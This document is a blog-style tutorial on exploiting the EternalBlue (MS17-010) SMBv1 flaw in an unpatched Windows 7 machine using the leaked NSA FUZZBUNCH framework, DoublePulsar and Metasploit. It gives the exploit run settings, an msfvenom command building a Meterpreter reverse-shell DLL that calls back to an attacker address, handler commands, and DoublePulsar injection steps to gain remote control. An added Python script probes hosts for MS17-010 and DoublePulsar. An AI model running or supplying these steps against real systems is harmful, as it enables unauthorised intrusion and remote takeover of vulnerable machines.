Exploit Eternalblue vulnerability using NSA leaked tools and metasploit – All things in moderation

Exploit Eternalblue vulnerability using NSA leaked tools and metasploit

Introduction

EternalBlue (CVE-2017-0144) is an exploit for a vulnerability in the SMBv1 implementation of Microsoft's Server Message Block (SMB) protocol, patched by Microsoft in bulletin MS17-010. It is believed to have been developed by the U.S. National Security Agency (NSA). It was leaked by the Shadow Brokers hacker group in April 2017 and was used as part of the worldwide WannaCry ransomware attack in May 2017.

Exploit Eternalblue vulnerability using NSA’s leaked tools (FUZZBUNCH) and the Metasploit framework

In April 2017, TheShadowBrokers published a set of tools stolen from the NSA's arsenal of hacking tools. A mirror of the dump is available on GitHub: https://github.com/misterch0c/shadowbroker.

FUZZBUNCH is the NSA's exploit framework, comparable to Metasploit.

In this tutorial we will use FUZZBUNCH to exploit a target vulnerable to EternalBlue, inject and execute a payload on the victim, and then use Metasploit's Meterpreter to control the compromised machine.

1. Setting up FUZZBUNCH

Requirements:

  • Python 2.6: https://www.python.org/download/releases/2.6/
  • PyWin32 v2.12: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
  • Target machine: Windows 7 without the MS17-010 update (SMBv1 is enabled by default)
  • Attacker machine 1: Windows 7 with FUZZBUNCH
  • Attacker machine 2: Kali linux with metasploit framework

Download the NSA tools, move into the folder shadowbroker-master/Windows, then open Fuzzbunch.xml and set the “ResourcesDir” and “LogDir” parameters to absolute paths that exist on the attacker machine.

Comment out the following line in fb.py (line number 72), because the leak contains no module named “ListeningPost”. If the line is left in, fb.py raises an error on startup.

# addplugins(fb, "ListeningPost", LP_DIR,      EDFPlugin)

2. Checking whether the target is vulnerable to Eternalblue

Execute fb.py with the command “python fb.py”.

Enter the target IP and the callback IP address (the attacker's IP address).

Use the default value for every parameter:

except the following, where the Mode must be changed to “1” (FB, traditional deployment from within FUZZBUNCH, instead of DANE):

Finally, if the target is vulnerable to EternalBlue the output ends with the message “Eternalblue Succeeded”. Note that this is not merely a check: the SMBv1 exploit has run and the DoublePulsar kernel-mode backdoor is now resident on the target, which is what step 5 talks to. A non-destructive check is the leak's Smbtouch module or Metasploit's auxiliary/scanner/smb/smb_ms17_010 scanner.
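The following script is an added example and is not part of the original post or of the leaked tools. It performs the non-destructive MS17-010 check that the scanners mentioned above rely on, using raw SMBv1 over TCP/445 with no external dependency: negotiate the NT LM 0.12 dialect, open an anonymous (null) session, connect to IPC$, then send a TRANS2 request with the SESSION_SETUP subcommand (0x000E). An unpatched server answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched one answers something else, typically STATUS_INVALID_PARAMETER (0xC000000D). The TRANS2 Timeout value 0x00A4D9A6 is the DoublePulsar ping, so the same request also tells you whether the backdoor installed in step 5 is already resident: the implant answers with MultiplexID 0x51 instead of the 0x41 that was sent. Field values such as the MaxBufferSize, PID and native OS strings are ordinary client defaults chosen here, the sample replies are constructed rather than captured, and the script assumes SMBv1 is reachable, signing is not enforced and anonymous IPC$ access is allowed (the Windows 7 defaults).

```python
"""MS17-010 / DoublePulsar probe over raw SMBv1 (added example, not the post's code)."""
import socket
import struct
import sys

SMB_HDR = '<4sBIBHH8sHHHHH'        # 32-byte SMBv1 header
SMB_COM_TRANS2 = 0x32
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP = 0x73
SMB_COM_TREE_CONNECT = 0x75
FLAGS2 = 0x4001                    # NT_STATUS | LONG_NAMES: errors arrive as 32-bit NTSTATUS
TRANS2_SESSION_SETUP = 0x000E      # TRANS2 subcommand the MS17-010 check relies on
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
MID_PROBE = 0x41                   # MultiplexID we send; a normal server echoes it back
MID_DOUBLEPULSAR = 0x51            # MultiplexID DoublePulsar answers its ping with
TIMEOUT_PING = 0x00A4D9A6          # TRANS2 Timeout value DoublePulsar interprets as "ping"


def smb_packet(command, body, tid=0, uid=0, mid=MID_PROBE):
    """Prepend the SMBv1 header and the 4-byte NetBIOS session header (type 0x00 + length)."""
    hdr = struct.pack(SMB_HDR, b'\xffSMB', command, 0, 0x18, FLAGS2, 0,
                      b'\x00' * 8, 0, tid, 0xFEFF, uid, mid)
    smb = hdr + body
    return struct.pack('>I', len(smb)) + smb


def negotiate():
    dialects = b'\x02NT LM 0.12\x00'                      # the only dialect we offer
    return smb_packet(SMB_COM_NEGOTIATE, struct.pack('<BH', 0, len(dialects)) + dialects)


def session_setup_null():
    """Anonymous (null) session: WordCount 13, zero-length OEM and Unicode passwords."""
    words = struct.pack('<BBHHHHIHHII', 0xFF, 0, 0,       # AndXCommand (none), reserved, AndXOffset
                        0xFFDF, 2, 0,                    # MaxBufferSize, MaxMpxCount, VcNumber
                        0, 0, 0, 0,                      # SessionKey, OEM/Unicode pw len, reserved
                        0x50)                            # Capabilities: CAP_NT_SMBS | CAP_STATUS32
    data = b'\x00' + b'\x00' + b'Unix\x00' + b'Samba\x00'  # account, domain, native OS, native LM
    body = struct.pack('<B', 13) + words + struct.pack('<H', len(data)) + data
    return smb_packet(SMB_COM_SESSION_SETUP, body)


def tree_connect_ipc(host, uid):
    """Connect to \\\\host\\IPC$ with an empty (single NUL) password, service "?????"."""
    data = b'\x00' + ('\\\\%s\\IPC$' % host).encode() + b'\x00' + b'?????\x00'
    words = struct.pack('<BBHHH', 0xFF, 0, 0, 0, 1)        # AndX..., Flags, PasswordLength
    body = struct.pack('<B', 4) + words + struct.pack('<H', len(data)) + data
    return smb_packet(SMB_COM_TREE_CONNECT, body, uid=uid)


def trans2_session_setup(tid, uid, timeout=TIMEOUT_PING):
    """TRANS2 with Setup[0] = SESSION_SETUP and 12 zero parameter bytes at offset 66."""
    params = b'\x00' * 12
    words = struct.pack('<HHHHBBHIHHHHHBBH',
                        len(params), 0, 1, 0,           # Total/Max Parameter and Data counts
                        0, 0, 0,                        # MaxSetupCount, reserved, Flags
                        timeout, 0,                     # Timeout (DoublePulsar opcode), reserved
                        len(params), 66, 0, 78,         # ParameterCount/Offset, DataCount/Offset
                        1, 0, TRANS2_SESSION_SETUP)     # SetupCount, reserved, Setup[0]
    data = b'\x00' + params                             # one pad byte so parameters start at 66
    body = struct.pack('<B', 15) + words + struct.pack('<H', len(data)) + data
    return smb_packet(SMB_COM_TRANS2, body, tid=tid, uid=uid)


def parse_header(pkt):
    """Return (command, nt_status, tid, uid, mid) from a NetBIOS-framed SMB reply."""
    proto, cmd, status, _f, _f2, _ph, _sig, _r, tid, _pid, uid, mid = \
        struct.unpack_from(SMB_HDR, pkt, 4)
    if proto != b'\xffSMB':
        raise ValueError('not an SMBv1 packet')
    return cmd, status, tid, uid, mid


def classify(status, mid):
    """Verdict from the TRANS2 SESSION_SETUP reply, mirroring Metasploit's smb_ms17_010 logic."""
    if mid == MID_DOUBLEPULSAR:               # the implant answered the ping itself
        return 'DOUBLEPULSAR_PRESENT'
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return 'VULNERABLE'
    return 'NOT_VULNERABLE'                   # e.g. STATUS_INVALID_PARAMETER from a patched host


def constructed_reply(status, mid, tid=0x0800, uid=0x0800):
    """Constructed sample reply (not captured traffic) used for offline demonstration."""
    hdr = struct.pack(SMB_HDR, b'\xffSMB', SMB_COM_TRANS2, status, 0x98, 0xC001, 0,
                      b'\x00' * 8, 0, tid, 0xFEFF, uid, mid)
    smb = hdr + b'\x00\x00\x00'               # WordCount 0, ByteCount 0
    return struct.pack('>I', len(smb)) + smb


def _recv_exact(sock, n):
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('connection closed by target')
        buf += chunk
    return buf


def recv_smb(sock):
    nb = _recv_exact(sock, 4)
    return nb + _recv_exact(sock, struct.unpack('>I', nb)[0] & 0xFFFFFF)


def check_host(host, port=445, timeout=5.0):
    """Negotiate -> null session -> IPC$ -> TRANS2 SESSION_SETUP; return (verdict, nt_status)."""
    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        for pkt, what in ((negotiate(), 'negotiate'), (session_setup_null(), 'null session')):
            sock.sendall(pkt)
            _, status, _, uid, _ = parse_header(recv_smb(sock))
            if status:
                raise RuntimeError('%s failed: NT status 0x%08X' % (what, status))
        sock.sendall(tree_connect_ipc(host, uid))
        _, status, tid, _, _ = parse_header(recv_smb(sock))
        if status:
            raise RuntimeError('IPC$ tree connect failed: NT status 0x%08X' % status)
        sock.sendall(trans2_session_setup(tid, uid))
        _, status, _, _, mid = parse_header(recv_smb(sock))
        return classify(status, mid), status
    finally:
        sock.close()


if __name__ == '__main__':
    if len(sys.argv) > 1:                     # python ms17010_probe.py <target-ip>
        verdict, status = check_host(sys.argv[1])
        print('%s: %s (NT status 0x%08X)' % (sys.argv[1], verdict, status))
    else:                                     # offline: classify constructed replies
        for st, mid in ((0xC0000205, MID_PROBE), (0xC000000D, MID_PROBE), (0xC0000002, MID_DOUBLEPULSAR)):
            print('status 0x%08X mid 0x%02X -> %s' % (st, mid, classify(st, mid)))
```

Run it only against hosts you are authorized to test. A DOUBLEPULSAR_PRESENT verdict means the host has already been exploited (by you in step 2, or by someone else), so do not read the accompanying NT status as a patch-level indicator; the implant, not the SMB server, produced the reply.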

3. Generate payload with msfvenom

Generate the payload as a DLL (the format DoublePulsar injects) with the following command in a Kali terminal. The architecture given with -a must match the target's Windows architecture (x86 here), and the payload chosen must be the same one the Metasploit handler in the next step is configured for:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.28.140 LPORT=4444 -b "\x00" -f dll -o /root/eternalblue/backdoor.dll

4. Start metasploit exploit/multi/handler

On the Kali attacker machine, start msfconsole and type the following commands so Metasploit can handle the callback from the payload generated above. The payload, LHOST and LPORT must match the msfvenom command exactly: a windows/meterpreter/reverse_tcp stager will not connect back to a handler listening for reverse_https.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.28.140

set lport 4444

run


5. Send and execute the payload on the target using DoublePulsar from the NSA leaked tools

The next step is to run DoublePulsar and inject the malicious backdoor.dll file. Enter the command “use DoublePulsar” in FUZZBUNCH:

Configure the target IP address, port (445), protocol (SMB), OS architecture, the function (RunDLL) and the path to the backdoor DLL file. The DLL's architecture must match the OS architecture selected here (x86 for the 32-bit Windows 7 target), otherwise the injection fails silently.

If the payload was sent to the victim successfully, the output looks like the following:

6. Compromise the target using the Meterpreter shell in Metasploit

The backdoor is now running on the target; when we switch back to Metasploit we should have received a Meterpreter session:

References

https://www.exploit-db.com/docs/41896.pdf
https://cysinfo.com/wp-content/uploads/2017/04/Shadow_release_updated.pdf
https://community.rapid7.com/community/metasploit/blog/2017/05/17/metasploit-the-power-of-the-community-and-eternalblue
https://en.wikipedia.org/wiki/EternalBlue
